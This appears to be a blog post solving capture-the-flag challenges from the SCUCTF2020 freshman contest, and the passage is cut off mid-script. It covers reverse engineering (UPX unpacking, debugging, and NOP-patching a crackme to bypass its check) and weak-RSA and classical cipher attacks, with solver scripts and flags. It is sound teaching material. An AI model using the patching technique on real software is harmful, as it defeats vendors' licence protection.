<!DOCTYPE html><html lang="zh-CN" data-theme="light"><head><meta charset="UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width,initial-scale=1"><title>SCUCTF2020 新生赛 | Icey's Blog</title><meta name="author" content="1c3y"><meta name="copyright" content="1c3y"><meta name="format-detection" content="telephone=no"><meta name="theme-color" content="#ffffff"><meta name="description" content="SCUCTF赛后的一点小小记录… Reverse1.easyF5 扔进IDA,然后F5得到flag:   2.easypack扔进exeinfope,发现有upx壳  直接kali脱壳  在OD打开  然后右键-&gt;中文搜索引擎-&gt;智能搜索,然后在输入语句后一句双击进入  Jnz处F2下断点,F9运行  随便输入一串验证码  回车后得到flag   3.pytrade把pyc文件进行py">
<meta property="og:type" content="article">
<meta property="og:title" content="SCUCTF2020 新生赛">
<meta property="og:url" content="http://example.com/2020/11/29/WriteUp/index.html">
<meta property="og:site_name" content="Icey&#39;s Blog">
<meta property="og:description" content="SCUCTF赛后的一点小小记录… Reverse1.easyF5 扔进IDA,然后F5得到flag:   2.easypack扔进exeinfope,发现有upx壳  直接kali脱壳  在OD打开  然后右键-&gt;中文搜索引擎-&gt;智能搜索,然后在输入语句后一句双击进入  Jnz处F2下断点,F9运行  随便输入一串验证码  回车后得到flag   3.pytrade把pyc文件进行py">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://i.loli.net/2021/03/21/OVXUobe5qvlNM4G.jpg">
<meta property="article:published_time" content="2020-11-28T16:47:00.000Z">
<meta property="article:modified_time" content="2021-03-21T07:09:00.322Z">
<meta property="article:author" content="1c3y">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://i.loli.net/2021/03/21/OVXUobe5qvlNM4G.jpg"><link rel="shortcut icon" href="/img/favicon.png"><link rel="canonical" href="http://example.com/2020/11/29/WriteUp/"><link rel="preconnect" href="//cdn.jsdelivr.net"/><link rel="preconnect" href="//busuanzi.ibruce.info"/><link rel="stylesheet" href="/css/index.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free/css/all.min.css" media="print" onload="this.media='all'"><script>const GLOBAL_CONFIG = { 
  root: '/',
  algolia: undefined,
  localSearch: undefined,
  translate: undefined,
  noticeOutdate: undefined,
  highlight: {"plugin":"highlighjs","highlightCopy":true,"highlightLang":true,"highlightHeightLimit":false},
  copy: {
    success: '复制成功',
    error: '复制错误',
    noSupport: '浏览器不支持'
  },
  relativeDate: {
    homepage: false,
    post: false
  },
  runtime: '',
  date_suffix: {
    just: '刚刚',
    min: '分钟前',
    hour: '小时前',
    day: '天前',
    month: '个月前'
  },
  copyright: undefined,
  lightbox: 'fancybox',
  Snackbar: undefined,
  source: {
    jQuery: 'https://cdn.jsdelivr.net/npm/jquery@latest/dist/jquery.min.js',
    justifiedGallery: {
      js: 'https://cdn.jsdelivr.net/npm/justifiedGallery/dist/js/jquery.justifiedGallery.min.js',
      css: 'https://cdn.jsdelivr.net/npm/justifiedGallery/dist/css/justifiedGallery.min.css'
    },
    fancybox: {
      js: 'https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@latest/dist/jquery.fancybox.min.js',
      css: 'https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@latest/dist/jquery.fancybox.min.css'
    }
  },
  isPhotoFigcaption: false,
  islazyload: false,
  isanchor: false
}</script><script id="config-diff">var GLOBAL_CONFIG_SITE = { 
  isPost: true,
  isHome: false,
  isHighlightShrink: false,
  isToc: true,
  postUpdate: '2021-03-21 15:09:00'
}</script><noscript><style type="text/css">
  #nav {
    opacity: 1
  }
  .justified-gallery img {
    opacity: 1
  }

  #recent-posts time,
  #post-meta time {
    display: inline !important
  }
</style></noscript><script>(win=>{
    win.saveToLocal = {
      set: function setWithExpiry(key, value, ttl) {
        if (ttl === 0) return
        const now = new Date()
        const expiryDay = ttl * 86400000
        const item = {
          value: value,
          expiry: now.getTime() + expiryDay,
        }
        localStorage.setItem(key, JSON.stringify(item))
      },

      get: function getWithExpiry(key) {
        const itemStr = localStorage.getItem(key)

        if (!itemStr) {
          return undefined
        }
        const item = JSON.parse(itemStr)
        const now = new Date()

        if (now.getTime() > item.expiry) {
          localStorage.removeItem(key)
          return undefined
        }
        return item.value
      }
    }
  
    win.getScript = url => new Promise((resolve, reject) => {
      const script = document.createElement('script')
      script.src = url
      script.async = true
      script.onerror = reject
      script.onload = script.onreadystatechange = function() {
        const loadState = this.readyState
        if (loadState && loadState !== 'loaded' && loadState !== 'complete') return
        script.onload = script.onreadystatechange = null
        resolve()
      }
      document.head.appendChild(script)
    })
  
      win.activateDarkMode = function () {
        document.documentElement.setAttribute('data-theme', 'dark')
        if (document.querySelector('meta[name="theme-color"]') !== null) {
          document.querySelector('meta[name="theme-color"]').setAttribute('content', '#0d0d0d')
        }
      }
      win.activateLightMode = function () {
        document.documentElement.setAttribute('data-theme', 'light')
        if (document.querySelector('meta[name="theme-color"]') !== null) {
          document.querySelector('meta[name="theme-color"]').setAttribute('content', '#ffffff')
        }
      }
      const t = saveToLocal.get('theme')
    
          if (t === 'dark') activateDarkMode()
          else if (t === 'light') activateLightMode()
        
      const asideStatus = saveToLocal.get('aside-status')
      if (asideStatus !== undefined) {
        if (asideStatus === 'hide') {
          document.documentElement.classList.add('hide-aside')
        } else {
          document.documentElement.classList.remove('hide-aside')
        }
      }
    })(window)</script><meta name="generator" content="Hexo 5.4.0"><link rel="alternate" href="/atom.xml" title="Icey's Blog" type="application/atom+xml">
</head><body><div id="sidebar"><div id="menu-mask"></div><div id="sidebar-menus"><div class="author-avatar"><img class="avatar-img" src="http://p.ananas.chaoxing.com/star3/origin/e79248a96a8b9a9f4c51e2e7beaabc5c.png" onerror="onerror=null;src='/img/friend_404.gif'" alt="avatar"/></div><div class="site-data"><div class="data-item is-center"><div class="data-item-link"><a href="/archives/"><div class="headline">文章</div><div class="length-num">7</div></a></div></div><div class="data-item is-center"><div class="data-item-link"><a href="/tags/"><div class="headline">标签</div><div class="length-num">3</div></a></div></div><div class="data-item is-center"><div class="data-item-link"><a href="/categories/"><div class="headline">分类</div><div class="length-num">2</div></a></div></div></div><hr/><div class="menus_items"><div class="menus_item"><a class="site-page" href="/"><i class="fa-fw fas fa-home"></i><span> Home</span></a></div><div class="menus_item"><a class="site-page" href="/archives/"><i class="fa-fw fas fa-archive"></i><span> Archives</span></a></div><div class="menus_item"><a class="site-page" href="/tags/"><i class="fa-fw fas fa-tags"></i><span> Tags</span></a></div><div class="menus_item"><a class="site-page" href="/categories/"><i class="fa-fw fas fa-folder-open"></i><span> Categories</span></a></div></div></div></div><div class="post" id="body-wrap"><header class="post-bg" id="page-header" style="background-image: url('https://i.loli.net/2021/03/21/OVXUobe5qvlNM4G.jpg')"><nav id="nav"><span id="blog_name"><a id="site-name" href="/">Icey's Blog</a></span><div id="menus"><div class="menus_items"><div class="menus_item"><a class="site-page" href="/"><i class="fa-fw fas fa-home"></i><span> Home</span></a></div><div class="menus_item"><a class="site-page" href="/archives/"><i class="fa-fw fas fa-archive"></i><span> Archives</span></a></div><div class="menus_item"><a class="site-page" href="/tags/"><i class="fa-fw fas fa-tags"></i><span> Tags</span></a></div><div class="menus_item"><a class="site-page" href="/categories/"><i class="fa-fw fas fa-folder-open"></i><span> Categories</span></a></div></div><div id="toggle-menu"><a class="site-page"><i class="fas fa-bars fa-fw"></i></a></div></div></nav><div id="post-info"><h1 class="post-title">SCUCTF2020 新生赛</h1><div id="post-meta"><div class="meta-firstline"><span class="post-meta-date"><i class="far fa-calendar-alt fa-fw post-meta-icon"></i><span class="post-meta-label">发表于</span><time class="post-meta-date-created" datetime="2020-11-28T16:47:00.000Z" title="发表于 2020-11-29 00:47:00">2020-11-29</time><span class="post-meta-separator">|</span><i class="fas fa-history fa-fw post-meta-icon"></i><span class="post-meta-label">更新于</span><time class="post-meta-date-updated" datetime="2021-03-21T07:09:00.322Z" title="更新于 2021-03-21 15:09:00">2021-03-21</time></span><span class="post-meta-categories"><span class="post-meta-separator">|</span><i class="fas fa-inbox fa-fw post-meta-icon"></i><a class="post-meta-categories" href="/categories/CTF/">CTF</a></span></div><div class="meta-secondline"><span class="post-meta-separator">|</span><span class="post-meta-pv-cv" id="" data-flag-title="SCUCTF2020 新生赛"><i class="far fa-eye fa-fw post-meta-icon"></i><span class="post-meta-label">阅读量:</span><span id="busuanzi_value_page_pv"></span></span></div></div></div></header><main class="layout" id="content-inner"><div id="post"><article class="post-content" id="article-container"><p>SCUCTF赛后的一点小小记录…</p>
<h2 id="Reverse"><a href="#Reverse" class="headerlink" title="Reverse"></a>Reverse</h2><h3 id="1-easyF5"><a href="#1-easyF5" class="headerlink" title="1.easyF5"></a>1.easyF5</h3><p><img src="https://gitee.com/see1c3y/scuctf2020/raw/master/re/re1/re1.1.png"></p>
<p>扔进IDA,然后F5得到flag:</p>
<p><img src="https://gitee.com/see1c3y/scuctf2020/raw/master/re/re1/re1.2.png"></p>
<hr>
<h3 id="2-easypack"><a href="#2-easypack" class="headerlink" title="2.easypack"></a>2.easypack</h3><p>扔进exeinfope,发现有upx壳</p>
<p><img src="https://gitee.com/see1c3y/scuctf2020/raw/master/re/re2/re2.1.png"></p>
<p>直接kali脱壳</p>
<p><img src="https://gitee.com/see1c3y/scuctf2020/raw/master/re/re2/re2.2.png"></p>
<p>在OD打开</p>
<p><img src="https://gitee.com/see1c3y/scuctf2020/raw/master/re/re2/re2.3.png"></p>
<p>然后右键-&gt;中文搜索引擎-&gt;智能搜索,然后在输入语句后一句双击进入</p>
<p><img src="https://gitee.com/see1c3y/scuctf2020/raw/master/re/re2/re2.4.png"></p>
<p>Jnz处F2下断点,F9运行</p>
<p><img src="https://gitee.com/see1c3y/scuctf2020/raw/master/re/re2/re2.5.png"></p>
<p>随便输入一串验证码</p>
<p><img src="https://gitee.com/see1c3y/scuctf2020/raw/master/re/re2/re2.6.png"></p>
<p>回车后得到flag</p>
<p><img src="https://gitee.com/see1c3y/scuctf2020/raw/master/re/re2/re2.7.png"></p>
<hr>
<h3 id="3-pytrade"><a href="#3-pytrade" class="headerlink" title="3.pytrade"></a>3.pytrade</h3><p>把pyc文件进行python反编译</p>
<p><img src="https://gitee.com/see1c3y/scuctf2020/raw/master/re/re3/re3.1.png"></p>
<p>将flag_base64进行base64解密,得到flag</p>
<p><img src="https://gitee.com/see1c3y/scuctf2020/raw/master/re/re3/re3.2.png"></p>
<hr>
<h3 id="4-crackme"><a href="#4-crackme" class="headerlink" title="4.crackme"></a>4.crackme</h3><p>OD运行,然后右键-&gt;中文搜索引擎-&gt;智能搜索,双击选中error进入</p>
<p><img src="https://gitee.com/see1c3y/scuctf2020/raw/master/re/re4/re4.1.png"></p>
<p>选中输入验证码跳转处</p>
<p><img src="https://gitee.com/see1c3y/scuctf2020/raw/master/re/re4/re4.2.png"></p>
<p>顺着红线找到跳转开始处</p>
<p><img src="https://gitee.com/see1c3y/scuctf2020/raw/master/re/re4/re4.3.png"></p>
<p>将其nop掉</p>
<p><img src="https://gitee.com/see1c3y/scuctf2020/raw/master/re/re4/re4.5.png"></p>
<p>选中刚才用NOP填充的代码段,右键单击“复制到可执行文件”—-“选择”,在新弹出的界面上点击右键–单击“保存文件”,然后选择保存路径和文件名即可。</p>
<p>打开刚保存的文件,破解成功</p>
<p><img src="https://gitee.com/see1c3y/scuctf2020/raw/master/re/re4/re4.4.png"></p>
<hr>
<h3 id="5-maze"><a href="#5-maze" class="headerlink" title="5.maze"></a>5.maze</h3><p>扔进IDA,F5查看main函数伪代码</p>
<p><img src="https://gitee.com/see1c3y/scuctf2020/raw/master/re/re5/re5.1.png"></p>
<p>分析程序可以知道,要救出马老师,需要走15步</p>
<p><img src="https://gitee.com/see1c3y/scuctf2020/blob/master/re/re5/re5.2.png"></p>
<p>进一步分析,发现输入的路径需要包括‘D’(ascii码值:68)、‘U’(85)、‘R’(82)这3个字符</p>
<p><img src="https://gitee.com/see1c3y/scuctf2020/raw/master/re/re5/re5.3.png"></p>
<p>v4是一个二维数组,也就是迷宫;当s[i] == ’D’时,v4的行下标加1,即向下走;当s[i]==‘U’时,v4的行下标减1,即向上走;当s[i] ==’R‘时,v4的列下标加1,即向右走</p>
<p>查看maze</p>
<p><img src="https://gitee.com/see1c3y/scuctf2020/raw/master/re/re5/re5.4.png"></p>
<p>结合前面的分析可知,maze是一个5行10列的矩阵,编写python 脚本,得到flag:</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">maze  =  <span class="string">&quot; *   *****&quot;</span> \</span><br><span class="line">      <span class="string">&quot;   * *****&quot;</span> \</span><br><span class="line">      <span class="string">&quot;****  ****&quot;</span> \</span><br><span class="line">      <span class="string">&quot;*****    *&quot;</span> \</span><br><span class="line">      <span class="string">&quot;********  &quot;</span></span><br><span class="line"></span><br><span class="line">route = <span class="string">&quot;下右右上右右下下右下右右右下右&quot;</span></span><br><span class="line">flag = route.replace(<span class="string">&#x27;下&#x27;</span>, <span class="built_in">chr</span>(<span class="number">68</span>)).replace(<span class="string">&#x27;右&#x27;</span>, <span class="built_in">chr</span>(<span class="number">82</span>)).replace(<span class="string">&#x27;上&#x27;</span>, <span class="built_in">chr</span>(<span class="number">85</span>))</span><br><span class="line">print(flag)</span><br></pre></td></tr></table></figure>


<hr>
<h3 id="6-decryptme"><a href="#6-decryptme" class="headerlink" title="6.decryptme"></a>6.decryptme</h3><p>这是一道算法逆向,先将附件扔进IDA分析</p>
<p><img src="https://gitee.com/see1c3y/scuctf2020/raw/master/re/re6/re6.1.png"></p>
<p>定位关键函数encrypt,双击进入</p>
<p><img src="https://gitee.com/see1c3y/scuctf2020/raw/master/re/re6/re6.2.png"></p>
<p>加密算法大致思路是:要求输入的字符串v6长度是32,加密函数encrypt传入的两个参数是v4和v6,v6字符串中的每一个字符经过加密,赋值给v4。<br>然后v4和buf进行比较,buf就是v6加密后的结果</p>
<p>查看buf:</p>
<p><img src="https://gitee.com/see1c3y/scuctf2020/raw/master/re/re6/re6.3.png"></p>
<p>考虑到flag的字符大都是字母、数字与下划线,可以进行爆破,编写脚本:</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># 选择ascii码值在48到122之间的字符</span></span><br><span class="line">buf = <span class="string">&quot;34e8h9?&lt;&lt;mkCD&gt;F@DEDCzHxxKRQRNSRS&quot;</span></span><br><span class="line">flag = <span class="string">&quot;&quot;</span></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">32</span>):</span><br><span class="line">    <span class="keyword">for</span> j <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">48</span>, <span class="number">123</span>):</span><br><span class="line">        v7 = j</span><br><span class="line">        v6 = i</span><br><span class="line">        v4 = <span class="number">0</span></span><br><span class="line">        <span class="keyword">while</span> <span class="literal">True</span>:</span><br><span class="line">            v4 = <span class="number">2</span> * (v6 &amp; v7)</span><br><span class="line">            v7 ^= v6</span><br><span class="line">            v6 = v4</span><br><span class="line">            <span class="keyword">if</span> <span class="keyword">not</span> v4:</span><br><span class="line">                <span class="keyword">break</span></span><br><span class="line">        <span class="keyword">if</span> <span class="built_in">chr</span>(v7) == buf[i]:</span><br><span class="line">            flag += <span class="built_in">chr</span>(j)</span><br><span class="line">            <span class="keyword">break</span></span><br><span class="line">print(flag)</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>得到flag:</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">33c5d4954da881814420f3ba39772644</span><br></pre></td></tr></table></figure>


<hr>
<h3 id="7-pytrade-plus"><a href="#7-pytrade-plus" class="headerlink" title="7.pytrade-plus"></a>7.pytrade-plus</h3><p>使用pyinstxtractor.py对pytrade-plus.exe进行反编译</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">python pyinstxtractor.py pytrade-plus.exe</span><br></pre></td></tr></table></figure>
<p>多出了一个目录:</p>
<p><img src="https://gitee.com/see1c3y/scuctf2020/raw/master/re/re7/re7.1.png"></p>
<p>在该目录下,找到一个app文件:</p>
<p><img src="https://gitee.com/see1c3y/scuctf2020/raw/master/re/re7/re7.2.png"></p>
<p>使用notepad++查看,发现controller字段:</p>
<p><img src="https://gitee.com/see1c3y/scuctf2020/raw/master/re/re7/re7.3.png"></p>
<p>在PYZ-00.pyz_extracted目录下找到controller.pyc,进行反编译,发现flag的加密方法:</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">verify</span>(<span class="params">self</span>):</span></span><br><span class="line">    <span class="keyword">try</span>:</span><br><span class="line">        flag = self._view.textflag.toPlainText()</span><br><span class="line">        flag = flag.replace(<span class="string">&#x27;scuctf&#123;&#x27;</span>, <span class="string">&#x27;&#x27;</span>)</span><br><span class="line">        flag = flag.replace(<span class="string">&#x27;&#125;&#x27;</span>, <span class="string">&#x27;&#x27;</span>)</span><br><span class="line">        flag = a2b_hex(flag)</span><br><span class="line">        x = <span class="built_in">int</span>(flag)</span><br><span class="line">        magicnum = <span class="number">0xA046AE0418E4646E7C383ADF588B29280C80B2DB5C320B4F5ACF096009FFC7A831D9B89CA1C65F7E1A6F9297720F7L</span></span><br><span class="line">        <span class="keyword">if</span> (x ** <span class="number">7</span> - <span class="number">300</span> * x ** <span class="number">6</span> - x ** <span class="number">3</span>) + x == magicnum:</span><br><span class="line">            self._view.textflag.setPlainText(<span class="string">&#x27;Yes, it is the real flag!&#x27;</span>)</span><br><span class="line">            <span class="keyword">return</span> <span class="literal">None</span></span><br><span class="line">        <span class="literal">None</span>._view.textflag.setPlainText(<span class="string">&#x27;NoNoNo!&#x27;</span>)</span><br><span class="line">        <span class="keyword">return</span> <span class="literal">None</span></span><br><span class="line">    <span class="keyword">except</span>:</span><br><span class="line">        self._view.textflag.setPlainText(<span class="string">&#x27;NoNoNo!&#x27;</span>)</span><br><span class="line">        <span class="keyword">return</span> <span class="literal">None</span></span><br><span class="line">        <span class="keyword">return</span> <span class="literal">None</span></span><br></pre></td></tr></table></figure>

<p>需要对方程进行求解,然后将解出的x转成16进制字符串,这里使用sympy进行方程求解:</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> sympy <span class="keyword">import</span> *</span><br><span class="line"><span class="keyword">import</span> binascii</span><br><span class="line"></span><br><span class="line">x = symbols(<span class="string">&#x27;x&#x27;</span>)</span><br><span class="line">magicnum = <span class="number">0xA046AE0418E4646E7C383ADF588B29280C80B2DB5C320B4F5ACF096009FFC7A831D9B89CA1C65F7E1A6F9297720F7</span></span><br><span class="line">R1 = solve((x ** <span class="number">7</span> - <span class="number">300</span> * x ** <span class="number">6</span> - x ** <span class="number">3</span>) + x - magicnum, x)[<span class="number">0</span>]</span><br><span class="line">a = <span class="built_in">str</span>(R1).encode()</span><br><span class="line">b = binascii.b2a_hex(a)</span><br><span class="line">print(b)</span><br><span class="line"><span class="comment"># scuctf&#123;39333031323433373134303932333037&#125;</span></span><br></pre></td></tr></table></figure>


<hr>
<h2 id="CRYPTO"><a href="#CRYPTO" class="headerlink" title="CRYPTO"></a>CRYPTO</h2><hr>
<h3 id="1-classic-1"><a href="#1-classic-1" class="headerlink" title="1.classic_1"></a>1.classic_1</h3><p>cipher = fphpgs{u3yy0_gu15_v5_gur_j0eyq_bs_py4ffvp_Pelcgb}<br>凯撒密码,位移是13</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">scuctf&#123;h3ll0_th15_i5_the_w0rld_of_cl4ssic_Crypto&#125;</span><br></pre></td></tr></table></figure>


<hr>
<h3 id="2-classic-2"><a href="#2-classic-2" class="headerlink" title="2.classic_2"></a>2.classic_2</h3><p>多重编码<br>hex-&gt;base64-&gt;摩斯密码<br>解出:</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">scuctf%u7b041918fc1ef6348768578f505f69d197%u7d</span><br></pre></td></tr></table></figure>
<p>这里需要将%u7b改成:”{“ %u7d改成”}”,得到:</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">scuctf&#123;041918fc1ef6348768578f505f69d197&#125;</span><br></pre></td></tr></table></figure>


<hr>
<h3 id="3-RSA-1"><a href="#3-RSA-1" class="headerlink" title="3.RSA_1"></a>3.RSA_1</h3><p>e = 3,该题为低加密指数攻击<br>使用脚本:</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># -*- coding: cp936 -*-</span></span><br><span class="line"><span class="keyword">import</span> gmpy2</span><br><span class="line">e = <span class="number">3</span></span><br><span class="line"><span class="comment"># 读入 n, 密文</span></span><br><span class="line">n = <span class="number">17076697689025821279984148703479525857912324396375097877800474725170566885465833732966897433803722770843910606215420934526050277173030062927090405120718833473629930226217051580832179577629652910778242159108718885516149768995851175071714817922775555170553827627677999093195969471873530031984433631909841287167351534954860426002075822101506835880510505034002629168205724869128357383388034971402180363910826536064357845040799329301895842061729319929568340334416516796267886218679042058969927331452548377324349084816441144473807565907927986545026739667157223640848553663532280797054758912745891410981282851031085852562257</span></span><br><span class="line">c = <span class="number">892408374578063131162925795619920779766603018609992406621503024400320421262482556891045333045408815199768659578199823419716777827460090306221618906101139272423449131313434967763664295600593363990276765767066758967765012850672428517786210813209127040442832574380675662826137452780727264357</span></span><br><span class="line"><span class="built_in">print</span> <span class="string">&#x27;n=&#x27;</span>, n</span><br><span class="line"><span class="built_in">print</span> <span class="string">&#x27;c=&#x27;</span>, c</span><br><span class="line"><span class="built_in">print</span> <span class="string">&#x27;[+]Detecting m...&#x27;</span></span><br><span class="line">result = gmpy2.iroot(c, <span class="number">3</span>)</span><br><span class="line"><span class="built_in">print</span> <span class="string">&#x27;  [-]The c has cubic root?&#x27;</span>, result[<span class="number">1</span>]</span><br><span class="line"><span class="keyword">if</span> result[<span class="number">1</span>]: <span class="built_in">print</span> <span class="string">&#x27;  [-]The m is:&#x27;</span>, <span class="string">&#x27;&#123;:x&#125;&#x27;</span>.<span class="built_in">format</span>(result[<span class="number">0</span>]).decode(<span class="string">&#x27;hex&#x27;</span>)</span><br><span class="line"><span class="built_in">print</span> <span class="string">&#x27;[!]All Done!&#x27;</span></span><br></pre></td></tr></table></figure>
<p>得到flag:</p>
<p><img src="https://gitee.com/see1c3y/scuctf2020/raw/master/crypto/cry3.1.png"></p>
<hr>
<h3 id="4-RSA-2"><a href="#4-RSA-2" class="headerlink" title="4.RSA_2"></a>4.RSA_2</h3><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">c = <span class="number">7162732898109470668490761172640544970587920562229245172318483665877098759808623298921271357899945260719802967519239</span></span><br><span class="line">n = <span class="number">21280377217500047527333756734822477656202976970565771310208586426341167199342722337358334403397116963913950346969157</span></span><br><span class="line">e = <span class="number">0x10001</span></span><br><span class="line"><span class="comment"># e = 65,537</span></span><br></pre></td></tr></table></figure>
<p>对n进行分解,得到三个质因子</p>
<p><img src="https://gitee.com/see1c3y/scuctf2020/raw/master/crypto/rsa2.1.png"></p>
<p>按照RSA加密原理进行解密,编写脚本:</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> Crypto.Util.number <span class="keyword">import</span> bytes_to_long, long_to_bytes, getPrime</span><br><span class="line"><span class="keyword">from</span> Crypto.Util.number <span class="keyword">import</span> *</span><br><span class="line"></span><br><span class="line">p1 = <span class="number">199045230832669039221046041578658179479</span></span><br><span class="line">p2 = <span class="number">319438022064098846441615805897528174851</span></span><br><span class="line">p3 = <span class="number">334688613728124045578795340681788885633</span></span><br><span class="line">e = <span class="number">65537</span></span><br><span class="line">c = <span class="number">7162732898109470668490761172640544970587920562229245172318483665877098759808623298921271357899945260719802967519239</span></span><br><span class="line">n = <span class="number">21280377217500047527333756734822477656202976970565771310208586426341167199342722337358334403397116963913950346969157</span></span><br><span class="line">fai = (p1 - <span class="number">1</span>) * (p2 - <span class="number">1</span>) * (p3 - <span class="number">1</span>)</span><br><span class="line">d = inverse(e, fai)</span><br><span class="line">m = <span class="built_in">pow</span>(c, d, n)</span><br><span class="line">print(long_to_bytes(m))</span><br><span class="line"><span class="comment"># scuctf&#123;e063d03aff353073c24617bd4b483f90&#125;</span></span><br></pre></td></tr></table></figure>


<hr>
<h3 id="5-math-1"><a href="#5-math-1" class="headerlink" title="5.math_1"></a>5.math_1</h3><p>考察中国剩余定理,脚本如下:</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> Crypto.Util.number <span class="keyword">import</span> getPrime</span><br><span class="line"><span class="keyword">from</span> Crypto.Util.number <span class="keyword">import</span> *</span><br><span class="line"><span class="keyword">import</span> random</span><br><span class="line"></span><br><span class="line"><span class="comment"># prime_list = []</span></span><br><span class="line"><span class="comment"># i = 0</span></span><br><span class="line"><span class="comment"># while (i&lt;100):</span></span><br><span class="line"><span class="comment">#     p = getPrime(256)</span></span><br><span class="line"><span class="comment">#     if p not in prime_list:</span></span><br><span class="line"><span class="comment">#         prime_list.append(p)</span></span><br><span class="line"><span class="comment">#         i += 1</span></span><br><span class="line"><span class="comment">#</span></span><br><span class="line"><span class="comment"># c_list = []</span></span><br><span class="line"><span class="comment"># i = 0</span></span><br><span class="line"><span class="comment"># for i in range(100):</span></span><br><span class="line"><span class="comment">#     r = random.randint(1, prime_list[i])</span></span><br><span class="line"><span class="comment">#     c_list.append(r)</span></span><br><span class="line"></span><br><span class="line">result = <span class="number">0</span></span><br><span class="line">prime_list = [...]</span><br><span class="line">c_list = [...]</span><br><span class="line"></span><br><span class="line">x = <span class="number">0</span></span><br><span class="line">m = <span class="number">1</span></span><br><span class="line">MR = []</span><br><span class="line">M = []</span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">100</span>):</span><br><span class="line">    m *= prime_list[i]</span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">100</span>):</span><br><span class="line">    M.append(m // prime_list[i])</span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">100</span>):</span><br><span class="line">    MR.append(inverse((M[i]), prime_list[i]))</span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">100</span>):</span><br><span class="line">    x += M[i] * MR[i] * 